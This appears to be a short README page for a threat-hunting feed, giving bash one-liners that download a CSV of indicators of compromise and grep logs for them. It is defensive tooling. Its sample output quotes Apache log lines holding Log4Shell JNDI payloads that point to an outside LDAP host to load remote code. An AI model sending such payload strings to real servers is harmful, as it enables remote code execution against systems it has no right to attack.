Hunt

Hunt IOCs in different environments


  1. Bash commands
  2. Microsoft Defender for Endpoint (MDE)

Bash commands

Some bash commands to get IOCs directly from Tweets.


1. Get raw IOCs by type (url / domain / ip / sha256 / md5)
Command:
curl -s {CSV feed} | awk -F, '$3 == "{type}"' | cut -d, -f4 > {Output File}
Command example - getting suspicious URLs from today:
curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, '$3 == "url"' | cut -d, -f4 > suspicious_urls.dat
Output example:
url1
url1
url3
url4
...

2. Get raw IOCs by tag (phishing / malware / CobaltStrike / Log4Shell / ...)
Command:
curl -s {CSV feed} | awk -F, 'tolower($5) ~ "{tag}"' | cut -d, -f4 > {Output File}
Command example - getting all IOCs related to CobaltStrike from today:
curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, 'tolower($5) ~ "CobaltStrike"' | cut -d, -f4 > iocs_CS.dat
Output example:
url
md5
ip
ip
ip
url
domain
md5
sha256
...

3. Search IOCs in a file (e.g. log files)
Command:
curl -s {CSV feed} | awk -F, '$3 == "{type}"' | cut -d, -f4 | while read line; do grep "$line" {File};done
Command example - searching IPs related to #Log4Shell vulnerability on Apache logs:
curl -s https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, '$3 == "ip" && $5 ~ "log4"' | cut -d, -f4 | while read line; do grep "$line" /var/log/apache2/access.log;done
Output example:
170.210.45.163 - - [16/Dec/2021:21:13:00 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 589 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [16/Dec/2021:21:13:01 +0000] "GET / HTTP/1.1" 301 509 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
170.210.45.163 - - [17/Dec/2021:01:48:06 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 5228 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [17/Dec/2021:01:48:07 +0000] "GET / HTTP/1.1" 301 5228 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"

Microsoft Defender for Endpoint (MDE) More info

Just examples, modify them as you wish.